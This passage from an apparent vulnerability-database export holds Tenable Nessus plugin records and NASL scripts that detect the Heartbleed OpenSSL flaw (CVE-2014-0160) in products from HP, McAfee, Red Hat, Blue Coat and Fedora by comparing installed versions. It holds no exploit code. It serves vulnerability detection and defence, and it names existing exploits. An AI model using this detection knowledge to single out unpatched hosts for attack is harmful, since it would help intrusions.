exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude(\"install_func.inc\");\n\napp_name = \"HP LoadRunner\";\ncutoff = NULL;\ncutoff2 = NULL;\nfixed = NULL;\nreport = NULL;\n\n# Only 1 install of the server is possible.\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\nverui = install['display_version'];\n\n# Determine cutoff if affected branch.\n# 11.52.0 is 11.52.1323.0 or 11.52.1517.0\n# 12.00.0 is 12.00.661.0\nif (version =~ \"^11\\.52($|[^0-9])\")\n{\n cutoff = \"11.52.1323.0\";\n cutoff2 = \"11.52.1517.0\";\n}\nif (version =~ \"^12\\.00?($|[^0-9])\")\n{\n cutoff = \"12.0.661.0\";\n cutoff2 = \"12.0.661.0\";\n}\n\nif (isnull(cutoff)) audit(AUDIT_NOT_INST, app_name + \" 11.52.x / 12.0.x\");\n\nif (version >= cutoff && version <= cutoff2)\n{\n foreach file (make_list(\"ssleay32_101_x32.dll\", \"ssleay32_101_x64.dll\"))\n {\n dll_path = path + \"bin\\\" + file;\n res = hotfix_get_fversion(path:dll_path);\n err_res = hotfix_handle_error(\n error_code : res['error'],\n file : dll_path,\n appname : app_name,\n exit_on_fail : FALSE\n );\n if (err_res) continue;\n\n dll_ver = join(sep:'.', res['value']);\n break;\n }\n hotfix_check_fversion_end();\n\n if (empty_or_null(dll_ver))\n audit(\n AUDIT_VER_FAIL,\n \"ssleay32_101_x32.dll and ssleay32_101_x64.dll under \" + path + \"bin\\\"\n );\n\n fixed_dll_ver = '1.0.1.4';\n if (ver_compare(ver:dll_ver, fix:fixed_dll_ver, strict:FALSE) == -1)\n report =\n '\\n Path : ' + dll_path +\n '\\n Installed DLL version : ' + dll_ver +\n '\\n Fixed DLL version : ' + fixed_dll_ver +\n '\\n';\n}\n# If not at a patchable version, use ver_compare() and suggest\n# upgrade if needed; do not use cutoff2 - this will lead to\n# false positives.\nelse if (\n (\n cutoff =~ \"^11\\.\" &&\n ver_compare(ver:\"11.52\", fix:version, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1\n )\n ||\n (\n cutoff =~ \"^12\\.\" &&\n ver_compare(ver:\"12.00\", fix:version, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1\n )\n)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.52.1323.0 (11.52 Patch 2) / 12.0.661.0 (12.00 Patch 1)' +\n '\\n';\n}\n\nif (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n\nport = kb_smb_transport();\n\nif (report_verbosity > 0) security_warning(extra:report, port:port);\nelse security_warning(port);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:45:59", "description": "The remote host is running a version of McAfee Next Generation\nFirewall (NGFW) that is affected by an information disclosure\nvulnerability due to a flaw in the OpenSSL library, commonly known as\nthe Heartbleed bug. An attacker could potentially exploit this\nvulnerability repeatedly to read up to 64KB of memory from the device.", "edition": 25, "published": "2014-05-02T00:00:00", "title": "McAfee Next Generation Firewall OpenSSL Information Disclosure (SB10071) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mcafee:ngfw"], "id": "MCAFEE_NGFW_SB10071.NASL", "href": "https://www.tenable.com/plugins/nessus/73835", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73835);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10071\");\n\n script_name(english:\"McAfee Next Generation Firewall OpenSSL Information Disclosure (SB10071) (Heartbleed)\");\n script_summary(english:\"Checks NGFW version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of McAfee Next Generation\nFirewall (NGFW) that is affected by an information disclosure\nvulnerability due to a flaw in the OpenSSL library, commonly known as\nthe Heartbleed bug. An attacker could potentially exploit this\nvulnerability repeatedly to read up to 64KB of memory from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:ngfw\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_ngfw_version.nbin\");\n script_require_keys(\"Host/McAfeeNGFW/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Next Generation Firewall\";\nversion = get_kb_item_or_exit(\"Host/McAfeeNGFW/version\");\n\n# Determine fix.\nif (version =~ \"^5\\.5\\.\") fix = \"5.5.7.9887\";\nelse if (version =~ \"^5\\.7\\.\") fix = \"5.7.1\";\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(extra:report, port:port);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-17T13:14:14", "description": "An updated rhev-hypervisor6 package that fixes one security issue is\nnow available for Red Hat Enterprise Virtualization Hypervisor 3.2.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nImportant: This update is an emergency security fix being provided\noutside the scope of the published support policy for Red Hat\nEnterprise Virtualization listed in the References section. In\naccordance with the support policy for Red Hat Enterprise\nVirtualization, Red Hat Enterprise Virtualization Hypervisor 3.2 will\nnot receive future security updates.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package, which corrects this issue.", "edition": 26, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-08T00:00:00", "title": "RHEL 6 : rhev-hypervisor6 (RHSA-2014:0396) (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-0396.NASL", "href": "https://www.tenable.com/plugins/nessus/79008", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0396. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79008);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"RHSA\", value:\"2014:0396\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor6 (RHSA-2014:0396) (Heartbleed)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated rhev-hypervisor6 package that fixes one security issue is\nnow available for Red Hat Enterprise Virtualization Hypervisor 3.2.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe rhev-hypervisor6 package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: a subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nImportant: This update is an emergency security fix being provided\noutside the scope of the published support policy for Red Hat\nEnterprise Virtualization listed in the References section. In\naccordance with the support policy for Red Hat Enterprise\nVirtualization, Red Hat Enterprise Virtualization Hypervisor 3.2 will\nnot receive future security updates.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nUsers of the Red Hat Enterprise Virtualization Hypervisor are advised\nto upgrade to this updated package, which corrects this issue.\"\n );\n # https://access.redhat.com/site/support/policy/updates/rhev/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/support/policy/updates/rhev/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0396\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0160\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rhev-hypervisor6 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0396\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.5-20140118.1.3.2.el6_5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6\");\n }\n}\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2021-01-01T03:15:34", "description": "According to its version, the HP Insight Control Server Migration\ninstall on the remote Windows host includes a bundled copy of OpenSSL\nthat is affected by an information disclosure vulnerability. A remote\nattacker could read the contents of up to 64KB of server memory,\npotentially exposing passwords, private keys, and other sensitive\ndata.", "edition": 26, "published": "2014-07-10T00:00:00", "title": "HP Insight Control Server Migration 7.3.0 and 7.3.1 OpenSSL Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:hp:insight_control_server_migration", "cpe:/a:hp:server_migration_pack_universal_edition"], "id": "HP_INSIGHT_CONTROL_SERVER_MIGRATION_7_3_2.NASL", "href": "https://www.tenable.com/plugins/nessus/76463", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76463);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04268240\");\n script_xref(name:\"HP\", value:\"HPSBMU03029\");\n script_xref(name:\"HP\", value:\"SSRT101543\");\n\n script_name(english:\"HP Insight Control Server Migration 7.3.0 and 7.3.1 OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks HP Insight Control Server Migration version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has migration software installed that is\naffected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the HP Insight Control Server Migration\ninstall on the remote Windows host includes a bundled copy of OpenSSL\nthat is affected by an information disclosure vulnerability. A remote\nattacker could read the contents of up to 64KB of server memory,\npotentially exposing passwords, private keys, and other sensitive\ndata.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04268240\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8929b483\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to HP Insight Control Server Migration 7.3.2, which is included\nwith the HP Insight Management 7.0.3a incremental update.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:server_migration_pack_universal_edition\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:insight_control_server_migration\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_insight_control_server_migration_installed.nbin\");\n script_require_keys(\"installed_sw/HP Insight Control Server Migration\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"HP Insight Control Server Migration\";\nget_install_count(app_name:app_name, exit_if_zero:TRUE);\n\n# Only 1 install of the server is possible.\ninstall = get_installs(app_name:app_name);\nif (install[0] == IF_NOT_FOUND) audit(AUDIT_NOT_INST, app_name);\ninstall = install[1][0];\n\nversion = install['version'];\npath = install['path'];\n\n# Determine fix if affected branch.\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\nif (version =~ \"^7\\.3(\\.0|$)\" || version == \"7.3.1\")\n{\n fix = \"7.3.2\";\n\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_warning(extra:report, port:port);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T01:21:59", "description": "The remote Blue Coat ProxySG device's SGOS self-reported version is\n6.5.3.x prior to 6.5.3.6. It is, therefore, potentially affected by an\ninformation disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.", "edition": 26, "published": "2014-04-15T00:00:00", "title": "Blue Coat ProxySG Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:bluecoat:sgos"], "id": "BLUECOAT_PROXY_SG_6_5_3_6.NASL", "href": "https://www.tenable.com/plugins/nessus/73515", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73515);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Blue Coat ProxySG Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks the Blue Coat ProxySG SGOS version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is potentially affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Blue Coat ProxySG device's SGOS self-reported version is\n6.5.3.x prior to 6.5.3.6. It is, therefore, potentially affected by an\ninformation disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bto.bluecoat.com/security-advisory/sa79\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 6.5.3.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:bluecoat:sgos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"bluecoat_proxy_sg_version.nasl\");\n script_require_keys(\"Host/BlueCoat/ProxySG/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"Host/BlueCoat/ProxySG/Version\");\nui_version = get_kb_item(\"Host/BlueCoat/ProxySG/UI_Version\");\n\nif (version =~ \"^6\\.5\\.3($|[^0-9])\")\n{\n fix = '6.5.3.6';\n ui_fix = '6.5.3.6 Build 0';\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Blue Coat ProxySG\", version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n if (report_verbosity > 0)\n {\n # Select format for output\n if (isnull(ui_version))\n {\n report_ver = version;\n report_fix = fix;\n }\n else\n {\n report_ver = ui_version;\n report_fix = ui_fix;\n }\n\n report =\n '\\n Installed version : ' + report_ver +\n '\\n Fixed version : ' + report_fix +\n '\\n';\n security_warning(port:0, extra:report);\n }\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Blue Coat ProxySG\", version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:12:41", "description": "pull in upstream patch for CVE-2014-0160", "edition": 11, "published": "2014-04-09T00:00:00", "title": "Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-09T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:openssl"], "id": "FEDORA_2014-4910.NASL", "href": "https://www.tenable.com/plugins/nessus/73430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-4910.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73430);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"FEDORA\", value:\"2014-4910\");\n\n script_name(english:\"Fedora 19 : openssl-1.0.1e-37.fc19.1 (2014-4910)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\"pull in upstream patch for CVE-2014-0160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085065\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cfcceed5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n script_end_attributes();\n\n 